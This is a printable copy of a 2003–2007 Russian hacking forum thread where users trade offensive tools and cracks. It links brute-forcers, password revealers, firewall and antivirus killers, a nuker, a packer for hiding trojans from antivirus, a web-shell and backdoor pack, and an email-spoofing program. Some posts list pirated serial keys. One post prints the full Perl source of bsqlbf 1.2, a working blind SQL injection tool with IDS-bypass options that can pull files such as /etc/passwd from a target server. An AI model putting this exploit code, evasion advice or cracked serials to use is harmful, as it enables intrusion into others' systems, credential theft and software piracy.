Версия для печати темы

Нажмите сюда для просмотра этой темы в обычном формате

MADALF FORUM _ SOFT & WAREZ _ Хак Soft

Автор: Spidey 21.08.2003, 15:55

http://www.hackdocs.host.kz/soft/brutus.zip ( 337 kb - windows ) - программа для перебора паролий к pop, ftp и многое другое.

http://www.hackdocs.host.kz/soft/UIN_PASS_v1.4.zip ( 276 kb - windows ) - отличная программа для генерирования листов типа uin;pass для последующего использования этих листов в IPDbrute и подобных программах.

http://www.hackdocs.host.kz/soft/openpass.rar (80 kb)- Сборник, программ который состоит из 5 программ для открытия паролей закрытых все теме же звездочками.

Автор: Spidey 22.08.2003, 12:51

http://www.antichat.ru/soft/words.zip (uknown)- Сборник слов для брутуса.

Автор: o][yd 14.11.2003, 22:39

http://ifud.ru/ipd/IPDbrute2udc2Pro.rar

Проводит брутфорс по веденному номеру ICQ

Поддерживает списки HTTPS проксей (метод CONNECT)

Многопоточный / через протокол ICQv8

Поддержка паролей в HEX (0x0d, 0x0a, и т. д.)

Поддерживает листы UIN’ов на проверку...

Удаляет неработающие прокси

Запуску из командной строки – просто ведите "IPDbrute2.exe autostar

Автор: trojanec 1.12.2003, 02:06

Новая демо версия XSpider 7
punk.gif


http://www.ptsecurity.ru/xs7download.asp

Автор: [xaos] 28.03.2004, 12:38

Цитата
LANguard Network Security Scanner 3.0

Users: No limitations s/n: 123FF-CMETN-12131-DHJY2-15161 Users: 25 s/n: 12319-CMETN-12131-DHJLF-15161 Users: 50 s/n: 12332-CMETN-12131-DHJEM-15161 Users: 100 s/n: 12364-CMETN-12131-DHJGK-15161 Users: 250 s/n: 123FA-CMETN-12131-DHJT7-15161


Цитата
LANguard Network Security Scanner 3.1.3

s/n: 116FF-FB0BE-28412-6I0XZ-33201-03403-05799-07777


Цитата
LANguard Network Security Scanner 3.0.0.422

s/n: 292FF-ELKDI-29205-EL8ZZ-29205


Цитата
LANguard Network Security Scanner 3.3 Build 20030709

SN: 117FF-FC0GD-23562-6EHXZ-32750-09602-04259-05773
SN: 106FF-FBLGD-24371-6FIXZ-31950-07044-02234-05998
SN: 104FF-F7VHD-24371-6BOXZ-35760-01746-08573-06067


Цитата
LANguard Network Security Scanner v3.3

Name: www.appzplanet.com
Serial: 183FF-FK4FL-21857-6DCXZ-38448-01068-04281-04118


Цитата
Languard Network Security Scanner v3.3 DATECODE 20040204

0NAFF-108TL-16J54-KC2XZ-CTMB8-UNiTED-CRACKiNG-FORCE-190666
or
QE5FF-RH071-S1OUH-FQHXZ-C8CPH-UNiTED-CRACKiNG-FORCE-190666

Автор: Spidey 29.03.2004, 11:41

http://www.madalf.ru/cgi-bin/stetchik/bsdcc.pl?19 ( 375 kb - windows ) - Всем поможет. Программа для востановления утерянных паролей. Короче поможет.

Автор: anechka_19 12.04.2004, 23:02

http://mirror1.safety-lab.com/SSS.exe кряк на асталависте..
http://www.freeproxy.ru/download/socks_checker.exe там же куча других прожек для работы с проксями
http://www.insidepro.com/download/passwordspro.zip Вообщем подбор MD5 и по словарю и брутофорсом и по маске. Так же еще и MD4 и показывает пароли скрытые звездочками.. но это не интересно.

Нравицца еще програмка Xavior Beta7 - подбор паролей через веб.. куча настроек. Она есть на этом сайте. В разделе soft. smile.gif

Автор: anechka_19 12.04.2004, 23:13

Ах вот еще интересная програмка smile.gif http://msender.chat.ru/mailsender.zip через нее можно отсылать мэйлы от чужого ящика и попортить немало нервов владельцу этого самого ящика и заставить его судорожно менять пароли smile.gif) Только она каким то не особо вредным вирусняком заражена.. Кто предупрежден - тот вооружен.
Вообще-то подмену можно и через telnet устроить. Кому как нравицца.

Автор: cannabis 16.04.2004, 06:12



Check Proxy Professional has the following features:

- Managing / checking HTTP proxy lists;
- Proxy list printing;
- Proxy anonymity level detection;
- Determines type of the proxy server (Anonymous/Transparent);
- Determines speed of the proxy server;
- Determines Location (country) of the proxy server;
- Recognize different formats of proxy list (separated by colon, spaces, tabs, etc.);
- Proxy finder (Proxy Hunter);
- Supports multi-threading (can check many proxies simultaneously);
- Daily updates of the database.


http://www.checkproxy.com/downloads/d2/CheckpPro-HTTP-Demo-4.00-500.EXE yes.gif


очен нужная вешч!

Автор: cannabis 22.04.2004, 06:02

http://www.wolfgang-brinkmann.de/BartPE/cain.cab

Сain&Abel

Автор: Iskr 25.09.2004, 20:03

Вот прога для того чтобы патчить файлы склеенные с троем, как правило Антивирь его после етого не видит...

Никто не поможет найти новую версию и крякк ней???

 pe_patcher.zip ( 92,16 килобайт ) : 1979
 

Автор: NADZIRATEL 25.09.2004, 20:06

кряк конечно поможем!
http://crackspider.net/search.shtml?q=pe_patcher&x=18&y=9

Автор: Str@nNIK 10.10.2004, 03:25

кому там надо было обойти или убить огненную стену? )))Держите.
к сожалению с лекарством беда- не успел найти ((

 antifrwl.zip ( 399,94 килобайт ) : 207
 

Автор: Str@nNIK 10.10.2004, 03:33

да и ще такойвот нюк,все по той же теме:
Новый нюкер для Windows. Быстрый и маленький, с возможностью
остановить в нужный момент, с возможностью подмены IP адреса и
контролем ошибок...

 nukeit.zip ( 12,23 килобайт ) : 2093
 

Автор: Str@nNIK 10.10.2004, 03:38

Sorri ne to )))) A vot to:Программа убивает на машине пользователя firewall? и антивирусы, выбранные приложения.

 optixkiller3.zip ( 281,14 килобайт ) : 292
 

Автор: Micro 5.11.2004, 23:04

А http://www.nirsoft.net/utils/pspv.zip (30 кб) «восстанавливает» информацию автозаполнения и Protected Storage (пароли для доступа к FTP-серверам и других мест) в IE и MSN Explorer (логин/пароль), пароли от POP3 аккаунтов Outlook Express.

Точно также всю необходимую информацию можно копировать буфер или сохранять в файл в текстовых и html форматах

Автор: Swen47 14.11.2004, 09:06

Mail PassView
Прога позволяет посмотреть пасс для почтовых программ.
Непроверял из-за отсутствия таковых.

Автор: Micro 15.11.2004, 22:04

http://www.nirsoft.net/utils/iecv.zip (95 кб) служит для просмотра детальной информации о куках (поддерживается только IE). Можно сортировать все куки по люой колонке, находить нужное путем указания имени сайта, удалять нежелательные, сохранять в обычный текстовый файл, копировать информацию в буфер, просматривать куки других пользователей (если есть доступ), изменять содержимое и т.д.

Автор: Micro 16.11.2004, 15:36

Swen47
Ой не рассмотрел ты её не туда запихал smile.gif

Добавлено @ [mergetime]1100608926[/mergetime]
Крохотная программа whois-клиент, позволяющая получить информацию о любом домене — http://www.gena01.com/win32whois/win32whois_0_9_1.zip (13 кб). Можно получать контактную, инфоормацию о DNS-серверах, блок ip-адресов и т.д. Подробнее на http://www.gena01.com/win32whois.

Вроде не было smile.gif thumbsup.gif

Автор: Swen47 16.11.2004, 16:58

http://bmerussia.com/0day/SmartWhois3.6.exe

Автор: Micro 17.11.2004, 18:21

1st Ip Port Scanner v2.0
Иногда нас всех тянет на дела хакерские. Например - просканировать диапазон ip на предмет открытых портов. Программа показала себя в тесте как качественный продуманный продукт.

Возможность выбирать тип пинга и резолв ипов в хостнеймы. Диапазон сканируемых портов. Да и интерфейс радует.

В поле отображения результатов выводятся в древовидной структуре ответившие на запрос машины и название сервисов, висящих на их открытых портах. Очень удобно!

http://195.96.182.180/uinz.ru/1111/1st.Ip.Port.Scanner.v2.0.Cracked-EXPLOSiON_UINZ.ru.zip [1.1 MB]
Взято с http://www.uinz.ru/ yes.gif

Автор: bdrFsg 22.11.2004, 17:48

Blue`s Port Scanner 5.0.2 - megaspeed!http://www.xakep.ru
IP Tools 2.20 рулеззhttp://www.xakep.ru
Putty - не помешает!

Автор: jur15t 29.01.2005, 16:16

может надо кому...
http://secondarytester.narod.ru/new/NScan.exe

Автор: CMEP4 23.02.2005, 22:46

универсальный сканер из 15 инструментов.
очень жаль что не поддерживает udp
для регистрации
name rth77!
code A9D206B673EC72DB71A353CDC987788211B6C0BE09F366EF9E2B4E025CC25BA1609783C3E1AEDC66
5827927997FEFB0ED2253DB1DA23373A4221B0B455396FBDDD6AFFD1A0B73CA6D9BDA7107985903C

 iptools.zip ( 66,99 килобайт ) : 120
 

Автор: flax 30.08.2005, 12:21

Прога для распаковки некоторых PE Файлов. Иногда бывает очень полезна.

 pe_scan.rar ( 68,72 килобайт ) : 56
 

Автор: MisterGenady 8.12.2005, 12:49

wwwHack

 wwwhack.zip ( 430,61 килобайт ) : 238
 

Автор: MisterGenady 4.03.2006, 19:53

Порты Троянских Прог

 ____________________.pdf ( 145,44 килобайт ) : 166
 

Автор: DeathMan 6.06.2006, 23:18

Цитата(forb @ 6.06.2006, 22:11)
А чего ни одного линка на закачку? И программа WWWHack, насколько я помню, для получения http форм сайта, а не для взлома паролей...хотя могу ошибаться! huh.gif thumbsup.gif
*


ссылка http://www.wwwhack.com/ clap.gif

Автор: Creeping Death 14.08.2006, 01:10

ArabianAttacker (WHTK) 1.0

Download it from here :
http://www.tm-world.net/ArabianAttacker/Download/ArabianAttacker-(WHTK).zip

Shell's inside :
c99
c99edited
r57-en
r57-ru
r57-ar
DX-Shell
RemView
WebAdmin
My-Shell

other files :
netcat
mswi (MySQL-Web-Interface)
cgi-telnet
e-mailLlistMackeR
IP-Logger
backdoor


Автор: LEVIAFAN 19.08.2006, 12:18

Cain & Abel v2.7.5 for Windows NT/2000/XP

http://www.oxid.it/downloads/ca_setup.exe

Автор: Creeping Death 18.09.2006, 16:03

NST Simple HTTP Scanner
is a tool programmed in C to find vulnerabilities on remote web servers by looking for files and directories.

The version 0.4 was released. In this version i implemented the POSIX threads (pthread). This way, the scanning its much more faster. Compiling the scanner with pthreads under a Windows plataform it's not easy at all. Here you have a link with the pthread-win32lib files and a readme file with all the instructions to make the scan work with the library (pthread-win32lib was tested under Windows XP SP2 compiling with the IDE Dev-C++ 4.9.9.2):
In the readme file of the scanner you can see how to compile the scanner under Linux (with GCC, adding the -lpthread for link the library) and under Windows.

New skills

- Security bugs fixed
- HTML Report improved
- New feature: subdomains scanning
- New feature: option -u for updates check
- New feature: use of POSIX threads (the scanner is much more faster)
- Default requests.txt improved


http://www.neosecurityteam.net/download.php?id=32

http://www.neosecurityteam.net/tools/sHTTP...canner_v0.4.exe
http://www.neosecurityteam.net/tools/sHTTP...canner_v0.4.bin


http://sourceforge.net/projects/shttpscanner/

Автор: Valter 27.09.2006, 02:00

http://www.cracklab.ru/download.php?action=get&n=MTU= Наверное самый лучший шестнадцатиричный редактор. Позволет редактировать файлы, память, диски, отображение адресации в HEX и десятичном формате, отображает значения, как байты, слова, двойные слова. Может конвертировать информацию (прибавлять, модифицировать по XOR). Может выдать исходники массива на паскале или си. Может производить автозамену по шестнадцатиричным значениям и по строкам. В общем, он лучший ! Хотя и не новинка для народа! unsure.gif

И ешо куча всякой хакерской всячины с этого сайта http://www.cracklab.ru/

Автор: Creeping Death 15.10.2006, 01:08

BitWise IM Personal 1.7.2

BitWise IM – IM клиент прямого общения и программа голосового чата, которая шифрует все сообщения и передаваемые данные.

BitWise IM работает с минимальным взаимодействием с сервером и позволяет работать в “безсерверном” режиме с поддержкой текстовых макросов, оффлайн сообщений, форвард на email, невидимый режим и многое другое. BitWise IM позволяет передавать файлы и содержит Web интерфейс для отправки сообщения и проверки оффлайн сообщений с любого компьютера, используя только Web браузер.


http://www.bitwiseim.com

Автор: [fR4g] 22.12.2006, 12:31

TrueCrypt v4.2a
Прога для шифрования дисков / создания зашифрованных образов.
Удобно делать зашифрованные флешки.
OpenSource, FreeWare. Засим есть шансы, что нет лазеек для того, кто очень попросит.
PS: Позволяет внутри существующего тома делать второй скрытый.
http://www.truecrypt.org/downloads.php
маст хэв.

Автор: self 28.12.2006, 13:08

tia, аналог :

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Creeping Death 12.01.2007, 12:52

bsqlbfv1.2
скрипт для подбора запросов при слепой SQL-Injection

CODE
#!/usr/bin/perl
# Blind SQL Injection POC. aramosf@514.es // http://www.514.es
#
# CHANGELOG:
# Tue Jul 13 10:14:19 RST 2006
# + threads support. for hungry hackers.
# Wed Jul 12 14:04:33 RST 2006
# + change sql teqneez mcdonalds powah 8) (more than 40% optimization)
# please, rip me!!, make your own paper!! =]
# + support for windows files (for example: C:\\boot.ini)
# + support for " and 1="1 sql injection
# + -binary and -ascii support
# - -charset option removed
# - -dict option removed
# + upgrade to v1.2
# Sat Apr 1 03:13:01 CEST 2006
# + -get now support resume (with -start option)
# Thu Mar 30 02:06:41 CEST 2006
# -get to fetch files (thank you ilo AGAIN)
# ***** RELIABLE SPEED IMPROVEMENT USING SOME SKILLS OF SQL AND BRAIN!!***
# Sat Mar 25 13:57:39 CET 2006
# Release `haqerz edition` of bsqlbf:
# + -time option added (IDS bypass)
# + -rtime option added (IDS bypass)
# + -rproxy option added (IDS bypass)
# + -ruagent option added (IDS bypass)
# Sun Dec 11 11:01:34 CET 2005
# + fixed automatch in POSTs
# + better output
# Mon Dec 5 18:30:03 CET 2005
# + added -blind option (to specify which attribute have sql injection).
# Tue Nov 29 17:31:54 CET 2005
# + auto search match string (when they arent -match option)
# Mon Nov 28 16:34:09 CET 2005
# + Support for POST and GET methods (-method get // -method post).
# + Cookies support (-cookie "blah=foo; moo=doo").
# + UserAgent support (-uagent "SQL Blind tool").
# Wed Nov 23 23:44:23 RST 2005
# First version 0.1:
# + code ripped from www.reversing.org <ilo[at]reversing.org> (thanks!)
#
#
# TODO:
# [ ] Rip more code from others.

use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
use threads;
use threads::shared;
use Time::HiRes qw( usleep);

$| = 1;


###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.2";
my $default_useragent = "bsqlbf $version";
my $default_sql = "version()";
###############################################################################


$| = 1;

my ($args, $solution);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my ($head, $tail, $high);
my $hits = 0;
my $amatch = 0;
my ($ua,$req);
my $furl;

###############################################################################
# Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($start, $length, $method, $cookie, $blind);
my ($help, $get);
my ($ascii, $binary);

my $options = GetOptions (
'help!' => \$help,
'url=s' => \$url,
'get=s' => \$get,
'sql=s' => \$sql,
'blind=s' => \$blind,
'match=s' => \$match,
'start=s' => \$start,
'length=s' => \$length,
'method=s' => \$method,
'uagent=s' => \$uagent,
'ruagent=s' => \$ruagent,
'cookie=s' => \$cookie,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'rproxy=s' => \$rproxy,
'debug!' => \$debug,
'binary!' =>\$binary,
'ascii!' => \$ascii,
'rtime=s' => \$rtime,
'time=i' => \$time );

&help unless ($url);
&help if $help eq 1;

#########################################################################
# Default Options.
$uagent ||= $default_useragent;
$debug ||= $default_debug;
$length ||= $default_length;
$solution ||= $start;
$method ||= $default_method;
$sql ||= $default_sql;
$time ||= $default_time;


&createlwp();
&parseurl();

if ( ! defined($blind)) {
$lastvar = $varsb[$#varsb];
$lastval = $vars{$lastvar};
} else {
$lastvar = $blind;
$lastval = $vars{$blind};
}

if (defined($cookie)) { &cookie() }

if (!$match) {
print "\nTrying to find a match string...\n" if $debug == 1;
$amatch = "1";
$match = fmatch("$url"," AND 1=");
if ($match eq "no vulnerable") {
print "\nNo vuln: 2nd..\n" if $debug ==1;
$match = fmatch("$url","\" AND 1=\"");
$head = "\"";
$tail = " AND 1=\"1";
};
if ($match eq "no vulnerable") {
print "Not vulnerable or use -blind\n";
exit 0;
}
}

&banner();
&httpintro();



( ! $get) ? sqlget() : fileget();

my @byte = ();
my $wait_me;

sub getbyte {
my $sql = $_[0];
my $bit="";
my @thread_count = ();
my $c = 8;
my $i = 0;
$high = 128 unless $ascii;#) ? 128 : { 64; $byte[0] = 0; };
$wait_me = 0;

share($wait_me);
share (@byte);

if ($ascii) {
$byte[0] = 0;
$high = 64;
}
for ($bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
$thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
$thread_count[$i]->detach;
$c--;
}

while ($wait_me <= 7) {
usleep(50);
#sleep(1);# if !$dontsleep;
}

my $str = join("",@byte);
#print "\nSTR: $str\n";
return pack("B*","$str");

}

sub launch_thread {
my ($sql, $bit, $c) = @_;
my $val = "$head and (ord($sql) %26 $bit)=0 $tail";
#print "VAL[$c] $val\n";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $val;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$val/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
lock @byte;
if (/\Q$match\E/) {
$byte[$c]=0;
last;
} else { $byte[$c] = 1; }
}
lock $wait_me;
threads->yield();
$wait_me++;
}

sub sqlget {
my ($fsize,$i,$s);
$s = "mid(length(length($sql)),1,1)";
my $lng .= getbyte($s);
for ($i=1;$i<=$lng;$i++) {
$s = "mid(length($sql),$i,1)";
$fsize.=getbyte($s);
}

#print "FSIZE: $fsize\n";
$length = $fsize. "bytes";
&bsqlintro();

my $rsize = $start + 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
$s = "mid($sql,$i,1)";
#print "S: $s\n";
my $byte = getbyte($s);
$solution .= $byte;
print $byte;
}
}

sub fileget {
my ($lget,$fstr);
if ($get =~ m/.*\/(.*)/) {
$lget = $1; }
$fstr = "0x".unpack("H*","$get");
if ($get =~ m/.*\\(.*)/) {
$lget = $1;
$fstr = "\"$get\"";
}

my $rsize = $start + 1;
if (-e "$lget" && ! $start) {
$rsize = -s "$lget";
print "Error: file ./$lget exists.\n";
print "You can erase or resume it with: -start $rsize\n";
exit 1
}
my ($i,$fsize);
$sql = "mid(length(length(load_file($fstr))),1,1)";
my $lng .= getbyte($sql);
for ($i=1;$i<=$lng;$i++) {
my $find = 0;
$sql = "mid(length(load_file($fstr)),$i,1)";
$fsize.=getbyte($sql);
}

if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
$length = $fsize. "bytes";
# starting ..
$sql = "load_file($get)";

&bsqlintro();
# Get file
#print "---> $lget";
open FILE, ">>$lget";
FILE->autoflush(1);
print "\n--- BEGIN ---\n";
my ($i,$b,$fcontent);
$rsize = 1 if $rsize < 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
my $find = 0;
my ($furl, $b_start, $b_end, $z);
$sql = "mid(load_file($fstr),$i,1)";
$fcontent=getbyte($sql);
print $fcontent;
print FILE "$fcontent";
}
print "\n--- END ---\n";
close FILE;
$solution = "success";
$sql = "$get";
}



&result();

#########################################################################
sub httpintro {
my ($strcookie, $strproxy, $struagent, $strtime, $i);
print "--[ http options ]"; print "-"x62; print "\n";
printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
printf ("%12s %-50s\n","path:", $path);
foreach (keys %vars) {
$i++;
printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
}
if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
printf ("%12s %-50s\n","cookies:",$strcookie);
if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
printf ("%12s %-50s\n","proxy_host:",$strproxy);
if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
# timing
if (! $time && !$rtime) { $strtime="0sec (default)" }
if ( $time == 0) { $strtime="0 sec (default)" }
if ( $time == 1) { $strtime="15 secs" }
if ( $time == 2) { $strtime="5 mins" }
if ($rtime) { $strtime = "rnd.time:$rtime" }
printf ("%12s %-50s\n","time:",$strtime);
}

sub bsqlintro {
my ($strstart, $strblind, $strlen, $strmatch, $strsql);
print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
if ($amatch eq 1) { $strmatch = "auto match:" } else { $strmatch = "match:"; }
#printf ("%12s %-60s\n","$strmatch",$match);
print " $strmatch $match\n";
print "-"x80; print "\n\n";
}

#########################################################################

sub createlwp {
my $proxyc;
&getproxy;
&getuagent if $ruagent;
LWP::Debug::level('+') if $debug gt 3;
$ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" });
$ua->agent("$uagent");
if (defined($proxy_user) && defined($proxy_pass)) {
my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
$proxy =~ m|^(?:([^:/?#]+)smile.gif?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
$proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
} else { $proxyc = $proxy; }

$ua->proxy(['http'] => $proxyc) if $proxy;
undef $proxy if $rproxy;
undef $uagent if $ruagent;
}

sub cookie {
# Cookies check
if ($cookie || $cookie =~ /; /) {
foreach my $c (split /;/, $cookie) {
my ($a,$b) = split /=/, $c;
if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
}
}
}

sub parseurl {
###############################################################################
# Official Regexp to parse URI. Thank you somebody.
($scheme, $authority, $path, $query, $fragment) =
$url =~ m|^(?:([^:/?#]+)smile.gif?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
# Parse args of URI into %vars and @varsb.
foreach my $varval (split /&/, $query) {
my ($var, $val) = split /=/, $varval;
$vars{$var} = $val;
push(@varsb, $var);
}
}


#########################################################################
# Show options at running:
sub banner {
print "\n // Blind SQL injection brute force.\n";
print " // aramosf\@514.es / http://www.514.es\n\n";
}


#########################################################################
# Get differences in HTML
sub fmatch {
my ($ok,$rtrn);
my ($furla, $furlb,$quote) = ($_[0], $_[0],$_[1]);
my ($html_a, $html_b);
if (lc($method) eq "get") {
$furla =~ s/($lastvar=$lastval)/$1 ${quote}1/;
$furlb =~ s/($lastvar=$lastval)/$1 ${quote}0/;
$html_a = fetch("$furla");
$html_b = fetch("$furlb");
} elsif (lc($method) eq "post") {
$vars{$lastvar} = $lastval . " ${quote}1";
$html_a = fetch("$furla");
$vars{$lastvar} = $lastval . " ${quote}0";
$html_b = fetch("$furla");
$vars{$lastvar} = $lastval;
}


#print "$html_a";
#print "$html_b";

if ($html_a eq $html_b) {
$rtrn = "no vulnerable";
return $rtrn;
}


my @h_a = split(/\n/,$html_a);
my @h_b = split(/\n/,$html_b);
foreach my $a (@h_a) {
$ok = 0;
if ($a =~ /\w/) {
foreach (@h_b) {
if ($a eq $_) {$ok = 1; }
}
} else { $ok = 1; }
$rtrn = $a;
last if $ok ne 1;
}
return $rtrn;
}


#########################################################################
# Fetch HTML from WWW
sub fetch {
print "fetch: $_[0]\n";
my $secs;
if ($time == 0) { $secs = 0 }
elsif ($time == 1) { $secs = 15 }
elsif ($time == 2) { $secs = 300 }
if ($rtime =~ /\d*-\d*/ && $time == 0) {
my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
srand; $secs = int(rand($p-$l+1))+$l;
} elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
print "You can't run with -time and -rtime. See -help.\n";
exit 1;
}
sleep $secs;

my $res;
if (lc($method) eq "get") {
my $fetch = $_[0];
if ($cookie) {
$res = $ua->get("$fetch", Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->get("$fetch");
}
} elsif (lc($method) eq "post") {
my($s, $a, $p, $q, $f) =
$url=~m|^(?:([^:/?#]+)smile.gif?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
my $fetch = "$s://$a".$p;
if ($cookie) {
$res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->post("$fetch",\%vars);
}
} else {
die "Wrong httpd method. Use -h for help\n";
}
my $html = $res->content();
return $html;
}


sub getproxy {
if ($rproxy && $proxy !~ /http/) {
my @lproxy;
open PROXY, $rproxy or die "Can't open file: $rproxy\n";
while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
close PROXY;
srand; my $ind = rand @lproxy;
$proxy = $lproxy[$ind];
} elsif ($rproxy && $proxy =~ /http/) {
print "You can't run with -proxy and -rproxy. See -help.\n";
exit 1;
}
}

sub getuagent {
my @uproxy;
open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
close UAGENT;
srand; my $ind = rand @uproxy;
$uagent = $uproxy[$ind];
chop($uagent);
}

sub result {
print "\r results: \n" .
" $sql = $solution\n" if length($solution) > 0;
print " total hits: $hits\n";
}


sub help {
&banner();
print " usage: $0 <-url http://www.host.com/path/script.php?foo=bar> [options]\n";
print "\n options:\n";
print " -sql:\t\tvalid SQL syntax to get; connection_id(), database(),\n";
print "\t\tsystem_user(), session_user(), current_user(), last_insert_id(),\n";
print "\t\tuser() or all data available in the requested query, for\n";
print "\t\texample: user.password. Default: version()\n";
print " -blind:\tparameter to inject sql. Default is last value of url\n";
print " -match:\tstring to match in valid query, Default is try to get auto\n";
print " -start:\tif you know the beginning of the string, use it.\n";
print " -length:\tmaximum length of value. Default is $default_length.\n";
print " -time:\t\ttimer options:\n";
print " \t0:\tdont wait. Default option.\n";
print " \t1:\twait 15 seconds\n";
print " \t2:\twait 5 minutes\n";
print " -rtime:\twait random seconds, for example: \"10-20\".\n";
print " -method:\thttp method to use; get or post. Default is $default_method.\n";
print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
print " -ruagent:\tfile with random http UserAgent header to use.\n";
print " -cookie:\thttp cookie header to use\n";
print " -rproxy:\tuse random http proxy from file list.\n";
print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
print " -proxy_user:\tproxy http user\n";
print " -proxy_pass:\tproxy http password\n";
print "\n examples:\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"user()\"\n";
print " bash# $0 -url http://www.buggy.com/bug.php?r=514&p=3 -get \"/etc/passwd\"\n";
exit(1);
}

Автор: Creeping Death 18.01.2007, 01:51

SQL Injection TooL

Программа SQL Injection TooL предназначена для изучения БД через ошибки в программном коде веб-сайтов, а точнее она использует т.н. SQL-инъекции.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 50 сообщений.

Автор: self 18.01.2007, 14:10

SAMInside 2.5.8.0

Описание программы

Восстановление паролей


Атака полным перебором:
Данный вид атаки представляет собой полный перебор всех возможных вариантов паролей.

Атака полным перебором также включает в себя атаку распределенным перебором. Данный вид атаки позволяет использовать для восстановления паролей несколько компьютеров, распределив между ними обрабатываемые пароли. Этот вид атаки включается автоматически, когда пользователь устанавливает количество компьютеров, участвующих в атаке, более одного. После этого становится доступной возможность выбора диапазона паролей для атаки на текущем компьютере. Таким образом, чтобы начать атаку распределенным перебором, вам необходимо:
Запустить программу на нескольких компьютерах.
Выбрать во всех экземплярах программы нужное количество компьютеров для атаки.
Установить одинаковые настройки для перебора на всех компьютерах.
Выбрать для каждого компьютера свой диапазон перебора паролей.
Запустить на каждом компьютере атаку полным перебором.

Атака по маске:
Данный вид атаки используется, если есть определенная информация о пароле. Например:
- Пароль начинается с комбинации символов "12345";
- Первые 4 символа пароля - цифры, остальные - латинские буквы;
- Пароль имеет длину 10 символов и в середине пароля есть сочетание букв "admin";
- И т.д.

Настройки перебора по маске позволяют сформировать маску для перебираемых паролей, а также установить максимальную длину перебираемых паролей. Установка маски заключается в следующем - если вы не знаете N-й символ пароля, то включите N-й флажок маски и в соответствующем текстовом поле укажите маску для этого символа. Если же вы заранее знаете определенный символ пароля, то впишите его в N-е текстовое поле и снимите флажок маски.

В программе используются следующие символы маски:
? - Любой печатаемый символ (ASCII-коды символов 32...255).
A - Любая заглавная латинская буква (A...Z).
a - Любая строчная латинская буква (a...z).
S - Любой специальный символ (!@#...).
N - Любая цифра (0...9).
1...8 - Любой символ из соответствующего пользовательского набора символов.

Атака по словарям:
Словарь - это текстовый файл, состоящий из часто употребляемых паролей типа
123
admin
master
и т.д.

Настройки атаки по словарям также включают и гибридную атаку, т.е. возможность добавлять к проверяемым паролям до 2 символов справа и слева, что позволяет восстанавливать такие пароли как "master12" или "#admin".

Атака по предварительно рассчитанным таблицам:
Данный вид атаки использует Rainbow-технологию (http://www.antsight.com/zsl/rainbowcrack/) для создания предварительно рассчитанных таблиц.

Дополнительно:
Для всех видов атак необходимо дополнительно указать - по каким хэшам (LM или NT) восстанавливать пароли.

Для атаки по словарям (в списке файлов словарей) и для атаки по Rainbow-таблицам (в списке файлов таблиц) необходимо отметить галочками те файлы, которые предполагается использовать в атаке.

Параметры командной строки

Программой можно управлять, используя следующие параметры командной строки:

-hidden : запуск программы в скрытом режиме;

-noreport : запрещает программе выдавать сообщения об окончании атаки;

-import : при загрузке программа сразу же выполнит автоматический импорт локальных пользователей;

-export : программа выполнит импорт локальных пользователей, сохранит результаты в файл SAMInside.OUT и завершит работу;

-minimize : запуск программы с минимизацией в трей.
Дополнительные возможности программы
Проверка пароля на всех пользователях, загруженных в программу.
Для этого в текстовом поле "Current password:" введите нужный пароль и нажмите F2. После этого программа проверит данный пароль на всех пользователях, пароль к которым еще не найден.

"Скрытый режим" работы программы (Ctrl+Alt+H).
